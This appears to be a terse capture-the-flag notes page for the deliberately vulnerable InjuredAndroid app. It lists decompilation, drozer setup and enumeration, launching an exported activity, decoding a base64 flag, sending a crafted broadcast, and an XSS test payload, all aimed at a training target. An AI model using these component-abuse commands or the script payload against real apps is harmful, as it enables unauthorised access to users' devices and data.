Injured Android

sallam@Mac-mini-Mosaad tools % ./apkx ../apps/InjuredAndroid.apk 
sallam@Mac-mini-Mosaad tools % ./j88nx -apk ../apps/InjuredAndroid.apk 
# Enable drozer agent in the emulator
# Starting Session
adb forward tcp:31415 tcp:31415
# start the drozer application in the emulator
drozer console connect
drozer console connect --server <ip>

# List Modes
ls
ls activity

# Retrieving package information 
run app.package.list -f <app name>
run app.package.info -a <package name>

# Identifying the attack surface
run app.package.attacksurface <package name>
<script>alert('Android');</script>
dz> run app.activity.start --component b3nac.injuredandroid b3nac.injuredandroid.b25lActivity
Attempting to run shell module
Take this and decode it
echo 'NF9vdmVyZG9uZV9vbWVsZXRz' | base64 -d
# in drozer
run app.broadcast.info -a b3nac.injuredandroid -i
run app.broadcast.send --component b3nac.injuredandroid b3nac.injandroid.TestBroadcastReceiver --extra string url hacked

Last updated

Was this helpful?